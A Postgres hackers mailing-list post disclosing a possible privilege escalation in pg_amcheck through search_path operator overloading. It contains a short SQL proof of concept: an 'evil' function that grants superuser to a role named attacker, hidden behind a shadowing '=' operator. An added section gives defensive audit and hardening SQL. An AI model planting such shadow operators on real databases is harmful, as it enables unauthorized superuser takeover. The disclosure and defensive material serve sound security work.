From: Pavel Borisov
Date: Fri, 22 May 2026 16:39:33 +0400
Subject: Permission elevation by pg_amcheck operator overloading via search_path possible?
To: Postgres hackers

Hi, hackers!

As I see, pg_amcheck doesn't set search_path. It runs SQL queries like:

    SELECT n.nspname, x.extversion
    FROM pg_catalog.pg_extension x
    JOIN pg_catalog.pg_namespace n ON x.extnamespace = n.oid
    WHERE x.extname = 'amcheck'

Let's suppose search_path for the database is set:

    search_path = 'myschema, pg_catalog'

Then

    CREATE FUNCTION myschema.evil(name, name) RETURNS bool AS $$
        ALTER USER attacker WITH SUPERUSER;
        SELECT $1 OPERATOR(pg_catalog.=) $2;
    $$ LANGUAGE sql;

    CREATE OPERATOR myschema.= (
        LEFTARG = name,
        RIGHTARG = name,
        PROCEDURE = myschema.evil
    );

Then run pg_amcheck as superuser. So the user attacker can become SUPERUSER.

Is this scenario worth fixing?

Regards,
Pavel Borisov
Supabase
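Added example, not part of the original message and not pg_amcheck's own code: an audit query a DBA can run to find operators outside pg_catalog that shadow a built-in operator with the same name and argument types, followed by the extension lookup quoted above rewritten so that it does not depend on search_path. It assumes only the standard system catalogs and the built-in set_config() function.

```sql
-- Added example (not from the original message).

-- 1. Audit: operators defined outside pg_catalog that have the same name
--    and argument types as a pg_catalog operator. Any row whose schema can
--    precede pg_catalog in a search_path deserves review, especially when
--    the owner is not a superuser.
SELECT n.nspname                      AS shadow_schema,
       o.oprname                      AS operator_name,
       o.oprleft::pg_catalog.regtype  AS left_type,
       o.oprright::pg_catalog.regtype AS right_type,
       o.oprcode                      AS implementing_function,
       r.rolname                      AS owner,
       r.rolsuper                     AS owner_is_superuser
FROM pg_catalog.pg_operator o
JOIN pg_catalog.pg_namespace n
  ON n.oid OPERATOR(pg_catalog.=) o.oprnamespace
JOIN pg_catalog.pg_roles r
  ON r.oid OPERATOR(pg_catalog.=) o.oprowner
WHERE n.nspname OPERATOR(pg_catalog.<>) 'pg_catalog'
  AND EXISTS (
        SELECT 1
        FROM pg_catalog.pg_operator b
        JOIN pg_catalog.pg_namespace bn
          ON bn.oid OPERATOR(pg_catalog.=) b.oprnamespace
        WHERE bn.nspname OPERATOR(pg_catalog.=) 'pg_catalog'
          AND b.oprname  OPERATOR(pg_catalog.=) o.oprname
          AND b.oprleft  OPERATOR(pg_catalog.=) o.oprleft
          AND b.oprright OPERATOR(pg_catalog.=) o.oprright)
ORDER BY 1, 2;

-- 2. Hardened form of the query quoted in the message.
--    An empty search_path leaves only the implicitly searched pg_catalog,
--    so unqualified names cannot resolve to objects in user schemas.
SELECT pg_catalog.set_config('search_path', '', false);

--    Defence in depth: the operators are schema-qualified as well, so the
--    query stays safe even if the session setting is changed later.
SELECT n.nspname, x.extversion
FROM pg_catalog.pg_extension x
JOIN pg_catalog.pg_namespace n
  ON x.extnamespace OPERATOR(pg_catalog.=) n.oid
WHERE x.extname OPERATOR(pg_catalog.=) 'amcheck';
```

The audit query qualifies its own operators for the same reason: it is meant to be run by a privileged role in a database whose search_path may not be trustworthy.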